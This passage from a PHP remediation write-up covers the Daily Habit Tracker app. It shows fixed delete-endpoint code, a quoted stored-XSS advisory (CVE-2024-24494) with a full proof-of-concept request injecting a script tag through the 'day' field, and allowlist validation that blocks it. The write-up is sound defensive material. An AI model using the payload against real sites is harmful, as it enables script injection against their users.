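// because it is not an integer, before any SQL exists.
function parse_tracker_id($raw): int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        exit('Invalid tracker id');
    }
    return $id;
}

// Prepared statement with the id bound as a parameter: even without the check
// above, the value could not alter the query structure. The WHERE clause also
// limits the delete to rows the caller owns, so a valid id of another user's
// tracker deletes nothing.
function delete_tracker(mysqli $conn, int $userId, int $trackerId): int {
    $stmt = $conn->prepare('DELETE FROM `tbl_tracker` WHERE `tbl_tracker_id` = ? AND `user_id` = ?');
    $stmt->bind_param('ii', $trackerId, $userId);
    $stmt->execute();
    return $stmt->affected_rows;   // 0: no such row, or not this user's row
}

session_start();
$userId    = require_login($_SESSION);
$trackerId = parse_tracker_id($_GET['tracker'] ?? '');
$deleted   = delete_tracker($conn, $userId, $trackerId);
header('Location: ../home.php?deleted=' . $deleted);
```

Applied to the requests in both advisories: the unauthenticated GET is answered with 401 before the parameter is read; the injected string is answered with 400; and a logged-in user who sends tracker=5 for a row that is not theirs gets affected_rows of 0 rather than a deletion. The same require_login() call belongs at the top of home.php, add-tracker.php and update-tracker.php, and update-tracker.php needs the same ownership condition on its UPDATE.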
<pre><code># Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)<br /># Date: 2 Feb 2024<br /># Exploit Author: Yevhenii Butenko<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html<br /># Version: 1.0<br /># Tested on: Debian<br /># CVE : CVE-2024-24494<br /><br />### Stored Cross-Site Scripting (XSS):<br /><br />> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.<br /><br />### Affected Components:<br /><br />> add-tracker.php, update-tracker.php<br /><br />Vulnerable parameters: <br />- day <br />- exercise <br />- pray <br />- read_book <br />- vitamins <br />- laundry <br />- alcohol <br />- meat<br /><br />### Description:<br /><br />> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. 
The application failed to sanitize user input while storing it to the database and reflecting back on the page.<br /><br />## Proof of Concept:<br /><br />The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability.<br /><br />Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:<br /><br />```<br />POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 175<br />Origin: http://localhost<br />DNT: 1<br />Connection: close<br />Referer: http://localhost/habit-tracker/home.php<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes<br />```<br /><br />![XSS Fired](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/xss.png?raw=true)<br /><br />## Recommendations<br /><br />When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.<br /><br /></code></pre>
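Every parameter listed in this advisory has a tiny fixed vocabulary: day is one of seven weekday names and the other seven are Yes or No. For such fields, exact allowlist matching rejects the stored-XSS payload outright rather than trying to strip it, and output encoding stays in place as the second layer. The following is an added example, not the project's code; the parameter names come from the request above, while the function and constant names are the example's own.

```php
<?php
// Added example, not the project's code: strict allowlist validation for the
// tracker fields named in this advisory, plus the output-encoding helper used
// wherever a stored value is rendered back into home.php.
// Parameter names come from the PoC request; everything else is assumed.

const DAYS  = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'];
const FLAGS = ['exercise', 'pray', 'read_book', 'vitamins', 'laundry', 'alcohol', 'meat'];

function validate_tracker(array $post): array {
    $clean = [];

    // date must be a real calendar date in YYYY-MM-DD form; round-tripping
    // through DateTime catches both bad formats and impossible dates.
    $raw  = (string)($post['date'] ?? '');
    $date = DateTime::createFromFormat('!Y-m-d', $raw);
    if ($date === false || $date->format('Y-m-d') !== $raw) {
        throw new InvalidArgumentException('date must be YYYY-MM-DD');
    }
    $clean['date'] = $raw;

    // day must be exactly one of the seven names (strict comparison, no substrings),
    // so "Tuesday<script>...</script>" from the PoC is rejected here.
    if (!in_array($post['day'] ?? '', DAYS, true)) {
        throw new InvalidArgumentException('day must be a weekday name');
    }
    $clean['day'] = $post['day'];

    // each flag is exactly "Yes" or "No"
    foreach (FLAGS as $f) {
        if (!in_array($post[$f] ?? '', ['Yes', 'No'], true)) {
            throw new InvalidArgumentException("{$f} must be Yes or No");
        }
        $clean[$f] = $post[$f];
    }
    return $clean;   // only these nine validated keys ever reach the INSERT/UPDATE
}

// Second layer: encode at render time, whatever was validated on input.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed inputs: a valid row, and the same row with the PoC's day value.
$good = ['date' => '1992-01-12', 'day' => 'Tuesday', 'exercise' => 'Yes', 'pray' => 'Yes',
         'read_book' => 'Yes', 'vitamins' => 'Yes', 'laundry' => 'Yes', 'alcohol' => 'Yes', 'meat' => 'Yes'];
$bad = $good;
$bad['day'] = "Tuesday<script>alert('STORED_XSS')</script>";

var_dump(validate_tracker($good) === $good);
try {
    validate_tracker($bad);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', h($e->getMessage()), PHP_EOL;
}
```

The first call returns the input unchanged, so a legitimate add-tracker request still works; the second throws before anything is stored, so the payload never reaches the database and there is nothing to reflect on the page. Free-text fields would not get this treatment (they would be length-limited and bound as parameters, then encoded on output), but fields with an enumerated vocabulary should never accept anything outside it.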